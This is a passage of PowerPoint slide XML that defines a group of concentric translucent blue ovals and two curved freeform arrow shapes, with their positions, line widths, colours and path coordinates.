            <p:cNvPr id="1582" name="Group 1581">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34A85616-C5E0-47E6-A321-1078E0FDD101}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="344548" y="1066800"/>
              <a:ext cx="3593344" cy="3669629"/>
              <a:chOff x="4818185" y="1461710"/>
              <a:chExt cx="2201013" cy="2247741"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2079" name="Group 95">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D58D5D09-C0E2-458A-A4D2-71751E8DB8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4818185" y="1461710"/>
                <a:ext cx="2201013" cy="2203409"/>
                <a:chOff x="1955" y="1224"/>
                <a:chExt cx="1911" cy="1911"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2083" name="Oval 2082">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88F89F08-53CD-4F1D-B86E-F082A5D1BF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1955" y="1224"/>
                  <a:ext cx="1911" cy="1911"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="12700" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0">
                      <a:alpha val="20000"/>
                    </a:srgbClr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66">
                          <a:alpha val="50000"/>
                        </a:srgbClr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17961" dir="2700000" algn="ctr" rotWithShape="0">
                          <a:srgbClr val="C0C0C0">
                            <a:gamma/>
                            <a:shade val="60000"/>
                            <a:invGamma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84" name="Oval 2083">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D15C47-F82B-43AA-B721-353ECCAF3D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2080" y="1355"/>
                  <a:ext cx="1660" cy="1660"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0">
                      <a:alpha val="20000"/>
                    </a:srgbClr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66">
                          <a:alpha val="50000"/>
                        </a:srgbClr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17961" dir="2700000" algn="ctr" rotWithShape="0">
                          <a:srgbClr val="C0C0C0">
                            <a:gamma/>
                            <a:shade val="60000"/>
                            <a:invGamma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85" name="Oval 2084">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2249D87-1007-441D-B2B7-40D6F130AE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2218" y="1499"/>
                  <a:ext cx="1396" cy="1396"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="38100" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0">
                      <a:alpha val="20000"/>
                    </a:srgbClr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66">
                          <a:alpha val="50000"/>
                        </a:srgbClr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17961" dir="2700000" algn="ctr" rotWithShape="0">
                          <a:srgbClr val="C0C0C0">
                            <a:gamma/>
                            <a:shade val="60000"/>
                            <a:invGamma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86" name="Oval 2085">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEDAEF76-F06E-44AC-93DE-A98C384A29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2338" y="1643"/>
                  <a:ext cx="1132" cy="1132"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="57150" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0">
                      <a:alpha val="20000"/>
                    </a:srgbClr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66">
                          <a:alpha val="50000"/>
                        </a:srgbClr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17961" dir="2700000" algn="ctr" rotWithShape="0">
                          <a:srgbClr val="C0C0C0">
                            <a:gamma/>
                            <a:shade val="60000"/>
                            <a:invGamma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87" name="Oval 2086">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D244FA6F-20C2-4F4B-BA06-EC621C644B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2476" y="1781"/>
                  <a:ext cx="868" cy="868"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="57150" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0">
                      <a:alpha val="20000"/>
                    </a:srgbClr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66">
                          <a:alpha val="50000"/>
                        </a:srgbClr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17961" dir="2700000" algn="ctr" rotWithShape="0">
                          <a:srgbClr val="C0C0C0">
                            <a:gamma/>
                            <a:shade val="60000"/>
                            <a:invGamma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88" name="Oval 2087">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC8C87B-A7F6-448C-AF20-C125396C3B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2602" y="1901"/>
                  <a:ext cx="616" cy="616"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="76200" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0">
                      <a:alpha val="20000"/>
                    </a:srgbClr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66">
                          <a:alpha val="50000"/>
                        </a:srgbClr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17961" dir="2700000" algn="ctr" rotWithShape="0">
                          <a:srgbClr val="C0C0C0">
                            <a:gamma/>
                            <a:shade val="60000"/>
                            <a:invGamma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89" name="Oval 2088">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B07EDB8A-0E01-4A10-9C11-C327E53455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2716" y="2021"/>
                  <a:ext cx="388" cy="388"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0">
                      <a:alpha val="20000"/>
                    </a:srgbClr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66">
                          <a:alpha val="50000"/>
                        </a:srgbClr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17961" dir="2700000" algn="ctr" rotWithShape="0">
                          <a:srgbClr val="C0C0C0">
                            <a:gamma/>
                            <a:shade val="60000"/>
                            <a:invGamma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080" name="Freeform 105">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6DC50D1-EE38-48B6-9794-E21D409CFDA5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm rot="10060125" flipH="1">
                <a:off x="5479566" y="3189451"/>
                <a:ext cx="929769" cy="520000"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 982"/>
                  <a:gd name="T1" fmla="*/ 774 h 774"/>
                  <a:gd name="T2" fmla="*/ 2 w 982"/>
                  <a:gd name="T3" fmla="*/ 770 h 774"/>
                  <a:gd name="T4" fmla="*/ 8 w 982"/>
                  <a:gd name="T5" fmla="*/ 754 h 774"/>
                  <a:gd name="T6" fmla="*/ 16 w 982"/>
                  <a:gd name="T7" fmla="*/ 730 h 774"/>
                  <a:gd name="T8" fmla="*/ 32 w 982"/>
                  <a:gd name="T9" fmla="*/ 698 h 774"/>
                  <a:gd name="T10" fmla="*/ 50 w 982"/>
                  <a:gd name="T11" fmla="*/ 660 h 774"/>
                  <a:gd name="T12" fmla="*/ 76 w 982"/>
                  <a:gd name="T13" fmla="*/ 618 h 774"/>
                  <a:gd name="T14" fmla="*/ 106 w 982"/>
                  <a:gd name="T15" fmla="*/ 574 h 774"/>
                  <a:gd name="T16" fmla="*/ 142 w 982"/>
                  <a:gd name="T17" fmla="*/ 528 h 774"/>
                  <a:gd name="T18" fmla="*/ 186 w 982"/>
                  <a:gd name="T19" fmla="*/ 482 h 774"/>
                  <a:gd name="T20" fmla="*/ 236 w 982"/>
                  <a:gd name="T21" fmla="*/ 438 h 774"/>
                  <a:gd name="T22" fmla="*/ 294 w 982"/>
                  <a:gd name="T23" fmla="*/ 398 h 774"/>
                  <a:gd name="T24" fmla="*/ 360 w 982"/>
                  <a:gd name="T25" fmla="*/ 360 h 774"/>
                  <a:gd name="T26" fmla="*/ 426 w 982"/>
                  <a:gd name="T27" fmla="*/ 332 h 774"/>
                  <a:gd name="T28" fmla="*/ 488 w 982"/>
                  <a:gd name="T29" fmla="*/ 314 h 774"/>
                  <a:gd name="T30" fmla="*/ 544 w 982"/>
                  <a:gd name="T31" fmla="*/ 304 h 774"/>
                  <a:gd name="T32" fmla="*/ 594 w 982"/>
                  <a:gd name="T33" fmla="*/ 300 h 774"/>
                  <a:gd name="T34" fmla="*/ 638 w 982"/>
                  <a:gd name="T35" fmla="*/ 300 h 774"/>
                  <a:gd name="T36" fmla="*/ 678 w 982"/>
                  <a:gd name="T37" fmla="*/ 304 h 774"/>
                  <a:gd name="T38" fmla="*/ 710 w 982"/>
                  <a:gd name="T39" fmla="*/ 312 h 774"/>
                  <a:gd name="T40" fmla="*/ 736 w 982"/>
                  <a:gd name="T41" fmla="*/ 320 h 774"/>
                  <a:gd name="T42" fmla="*/ 754 w 982"/>
                  <a:gd name="T43" fmla="*/ 326 h 774"/>
                  <a:gd name="T44" fmla="*/ 766 w 982"/>
                  <a:gd name="T45" fmla="*/ 332 h 774"/>
                  <a:gd name="T46" fmla="*/ 770 w 982"/>
                  <a:gd name="T47" fmla="*/ 334 h 774"/>
                  <a:gd name="T48" fmla="*/ 680 w 982"/>
                  <a:gd name="T49" fmla="*/ 476 h 774"/>
                  <a:gd name="T50" fmla="*/ 982 w 982"/>
                  <a:gd name="T51" fmla="*/ 370 h 774"/>
                  <a:gd name="T52" fmla="*/ 912 w 982"/>
                  <a:gd name="T53" fmla="*/ 0 h 774"/>
                  <a:gd name="T54" fmla="*/ 854 w 982"/>
                  <a:gd name="T55" fmla="*/ 150 h 774"/>
                  <a:gd name="T56" fmla="*/ 850 w 982"/>
                  <a:gd name="T57" fmla="*/ 148 h 774"/>
                  <a:gd name="T58" fmla="*/ 838 w 982"/>
                  <a:gd name="T59" fmla="*/ 142 h 774"/>
                  <a:gd name="T60" fmla="*/ 822 w 982"/>
                  <a:gd name="T61" fmla="*/ 134 h 774"/>
                  <a:gd name="T62" fmla="*/ 798 w 982"/>
                  <a:gd name="T63" fmla="*/ 126 h 774"/>
                  <a:gd name="T64" fmla="*/ 768 w 982"/>
                  <a:gd name="T65" fmla="*/ 120 h 774"/>
                  <a:gd name="T66" fmla="*/ 732 w 982"/>
                  <a:gd name="T67" fmla="*/ 114 h 774"/>
                  <a:gd name="T68" fmla="*/ 692 w 982"/>
                  <a:gd name="T69" fmla="*/ 110 h 774"/>
                  <a:gd name="T70" fmla="*/ 646 w 982"/>
                  <a:gd name="T71" fmla="*/ 110 h 774"/>
                  <a:gd name="T72" fmla="*/ 596 w 982"/>
                  <a:gd name="T73" fmla="*/ 116 h 774"/>
                  <a:gd name="T74" fmla="*/ 540 w 982"/>
                  <a:gd name="T75" fmla="*/ 126 h 774"/>
                  <a:gd name="T76" fmla="*/ 482 w 982"/>
                  <a:gd name="T77" fmla="*/ 146 h 774"/>
                  <a:gd name="T78" fmla="*/ 422 w 982"/>
                  <a:gd name="T79" fmla="*/ 172 h 774"/>
                  <a:gd name="T80" fmla="*/ 356 w 982"/>
                  <a:gd name="T81" fmla="*/ 210 h 774"/>
                  <a:gd name="T82" fmla="*/ 290 w 982"/>
                  <a:gd name="T83" fmla="*/ 258 h 774"/>
                  <a:gd name="T84" fmla="*/ 230 w 982"/>
                  <a:gd name="T85" fmla="*/ 310 h 774"/>
                  <a:gd name="T86" fmla="*/ 178 w 982"/>
                  <a:gd name="T87" fmla="*/ 364 h 774"/>
                  <a:gd name="T88" fmla="*/ 136 w 982"/>
                  <a:gd name="T89" fmla="*/ 422 h 774"/>
                  <a:gd name="T90" fmla="*/ 100 w 982"/>
                  <a:gd name="T91" fmla="*/ 480 h 774"/>
                  <a:gd name="T92" fmla="*/ 72 w 982"/>
                  <a:gd name="T93" fmla="*/ 536 h 774"/>
                  <a:gd name="T94" fmla="*/ 48 w 982"/>
                  <a:gd name="T95" fmla="*/ 590 h 774"/>
                  <a:gd name="T96" fmla="*/ 30 w 982"/>
                  <a:gd name="T97" fmla="*/ 640 h 774"/>
                  <a:gd name="T98" fmla="*/ 18 w 982"/>
                  <a:gd name="T99" fmla="*/ 684 h 774"/>
                  <a:gd name="T100" fmla="*/ 8 w 982"/>
                  <a:gd name="T101" fmla="*/ 722 h 774"/>
                  <a:gd name="T102" fmla="*/ 4 w 982"/>
                  <a:gd name="T103" fmla="*/ 750 h 774"/>
                  <a:gd name="T104" fmla="*/ 0 w 982"/>
                  <a:gd name="T105" fmla="*/ 768 h 774"/>
                  <a:gd name="T106" fmla="*/ 0 w 982"/>
                  <a:gd name="T107" fmla="*/ 774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82" h="774">
                    <a:moveTo>
                      <a:pt x="0" y="774"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="754"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="618"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="710" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="854" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="822" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="684"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="722"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="774"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="C25E8B">
                      <a:gamma/>
                      <a:tint val="50980"/>
                      <a:invGamma/>
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="C25E8B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1" name="Freeform 106">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFEA3E32-A845-49D1-A542-0B921F3F1080}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm rot="17117549" flipH="1">
                <a:off x="4702564" y="1879266"/>
                <a:ext cx="901013" cy="504423"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 982"/>
                  <a:gd name="T1" fmla="*/ 774 h 774"/>
                  <a:gd name="T2" fmla="*/ 2 w 982"/>
                  <a:gd name="T3" fmla="*/ 770 h 774"/>
                  <a:gd name="T4" fmla="*/ 8 w 982"/>
                  <a:gd name="T5" fmla="*/ 754 h 774"/>
                  <a:gd name="T6" fmla="*/ 16 w 982"/>
                  <a:gd name="T7" fmla="*/ 730 h 774"/>
                  <a:gd name="T8" fmla="*/ 32 w 982"/>
                  <a:gd name="T9" fmla="*/ 698 h 774"/>
                  <a:gd name="T10" fmla="*/ 50 w 982"/>
                  <a:gd name="T11" fmla="*/ 660 h 774"/>
                  <a:gd name="T12" fmla="*/ 76 w 982"/>
                  <a:gd name="T13" fmla="*/ 618 h 774"/>
                  <a:gd name="T14" fmla="*/ 106 w 982"/>
                  <a:gd name="T15" fmla="*/ 574 h 774"/>
                  <a:gd name="T16" fmla="*/ 142 w 982"/>
                  <a:gd name="T17" fmla="*/ 528 h 774"/>
                  <a:gd name="T18" fmla="*/ 186 w 982"/>
                  <a:gd name="T19" fmla="*/ 482 h 774"/>
                  <a:gd name="T20" fmla="*/ 236 w 982"/>
                  <a:gd name="T21" fmla="*/ 438 h 774"/>
                  <a:gd name="T22" fmla="*/ 294 w 982"/>
                  <a:gd name="T23" fmla="*/ 398 h 774"/>
                  <a:gd name="T24" fmla="*/ 360 w 982"/>
                  <a:gd name="T25" fmla="*/ 360 h 774"/>
                  <a:gd name="T26" fmla="*/ 426 w 982"/>
                  <a:gd name="T27" fmla="*/ 332 h 774"/>
                  <a:gd name="T28" fmla="*/ 488 w 982"/>
                  <a:gd name="T29" fmla="*/ 314 h 774"/>
                  <a:gd name="T30" fmla="*/ 544 w 982"/>
                  <a:gd name="T31" fmla="*/ 304 h 774"/>
                  <a:gd name="T32" fmla="*/ 594 w 982"/>
                  <a:gd name="T33" fmla="*/ 300 h 774"/>
                  <a:gd name="T34" fmla="*/ 638 w 982"/>
                  <a:gd name="T35" fmla="*/ 300 h 774"/>
                  <a:gd name="T36" fmla="*/ 678 w 982"/>
                  <a:gd name="T37" fmla="*/ 304 h 774"/>
                  <a:gd name="T38" fmla="*/ 710 w 982"/>
                  <a:gd name="T39" fmla="*/ 312 h 774"/>
                  <a:gd name="T40" fmla="*/ 736 w 982"/>
                  <a:gd name="T41" fmla="*/ 320 h 774"/>
                  <a:gd name="T42" fmla="*/ 754 w 982"/>
                  <a:gd name="T43" fmla="*/ 326 h 774"/>
                  <a:gd name="T44" fmla="*/ 766 w 982"/>
                  <a:gd name="T45" fmla="*/ 332 h 774"/>
                  <a:gd name="T46" fmla="*/ 770 w 982"/>
                  <a:gd name="T47" fmla="*/ 334 h 774"/>
                  <a:gd name="T48" fmla="*/ 680 w 982"/>
                  <a:gd name="T49" fmla="*/ 476 h 774"/>
                  <a:gd name="T50" fmla="*/ 982 w 982"/>
                  <a:gd name="T51" fmla="*/ 370 h 774"/>
                  <a:gd name="T52" fmla="*/ 912 w 982"/>
                  <a:gd name="T53" fmla="*/ 0 h 774"/>
                  <a:gd name="T54" fmla="*/ 854 w 982"/>
                  <a:gd name="T55" fmla="*/ 150 h 774"/>
                  <a:gd name="T56" fmla="*/ 850 w 982"/>
                  <a:gd name="T57" fmla="*/ 148 h 774"/>
                  <a:gd name="T58" fmla="*/ 838 w 982"/>
                  <a:gd name="T59" fmla="*/ 142 h 774"/>
                  <a:gd name="T60" fmla="*/ 822 w 982"/>
                  <a:gd name="T61" fmla="*/ 134 h 774"/>
                  <a:gd name="T62" fmla="*/ 798 w 982"/>
                  <a:gd name="T63" fmla="*/ 126 h 774"/>
                  <a:gd name="T64" fmla="*/ 768 w 982"/>
                  <a:gd name="T65" fmla="*/ 120 h 774"/>
                  <a:gd name="T66" fmla="*/ 732 w 982"/>
                  <a:gd name="T67" fmla="*/ 114 h 774"/>
                  <a:gd name="T68" fmla="*/ 692 w 982"/>
                  <a:gd name="T69" fmla="*/ 110 h 774"/>
                  <a:gd name="T70" fmla="*/ 646 w 982"/>
                  <a:gd name="T71" fmla="*/ 110 h 774"/>
                  <a:gd name="T72" fmla="*/ 596 w 982"/>
                  <a:gd name="T73" fmla="*/ 116 h 774"/>
                  <a:gd name="T74" fmla="*/ 540 w 982"/>
                  <a:gd name="T75" fmla="*/ 126 h 774"/>
                  <a:gd name="T76" fmla="*/ 482 w 982"/>
                  <a:gd name="T77" fmla="*/ 146 h 774"/>
                  <a:gd name="T78" fmla="*/ 422 w 982"/>
                  <a:gd name="T79" fmla="*/ 172 h 774"/>
                  <a:gd name="T80" fmla="*/ 356 w 982"/>
                  <a:gd name="T81" fmla="*/ 210 h 774"/>
                  <a:gd name="T82" fmla="*/ 290 w 982"/>
                  <a:gd name="T83" fmla="*/ 258 h 774"/>
                  <a:gd name="T84" fmla="*/ 230 w 982"/>
                  <a:gd name="T85" fmla="*/ 310 h 774"/>
                  <a:gd name="T86" fmla="*/ 178 w 982"/>
                  <a:gd name="T87" fmla="*/ 364 h 774"/>
                  <a:gd name="T88" fmla="*/ 136 w 982"/>
                  <a:gd name="T89" fmla="*/ 422 h 774"/>
                  <a:gd name="T90" fmla="*/ 100 w 982"/>
                  <a:gd name="T91" fmla="*/ 480 h 774"/>
                  <a:gd name="T92" fmla="*/ 72 w 982"/>
                  <a:gd name="T93" fmla="*/ 536 h 774"/>
                  <a:gd name="T94" fmla="*/ 48 w 982"/>
                  <a:gd name="T95" fmla="*/ 590 h 774"/>
                  <a:gd name="T96" fmla="*/ 30 w 982"/>
                  <a:gd name="T97" fmla="*/ 640 h 774"/>
                  <a:gd name="T98" fmla="*/ 18 w 982"/>
                  <a:gd name="T99" fmla="*/ 684 h 774"/>
                  <a:gd name="T100" fmla="*/ 8 w 982"/>
                  <a:gd name="T101" fmla="*/ 722 h 774"/>
                  <a:gd name="T102" fmla="*/ 4 w 982"/>
                  <a:gd name="T103" fmla="*/ 750 h 774"/>
                  <a:gd name="T104" fmla="*/ 0 w 982"/>
                  <a:gd name="T105" fmla="*/ 768 h 774"/>
                  <a:gd name="T106" fmla="*/ 0 w 982"/>
                  <a:gd name="T107" fmla="*/ 774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82" h="774">
                    <a:moveTo>
                      <a:pt x="0" y="774"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="754"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="618"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="710" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="854" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="822" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="684"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="722"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="768"/>
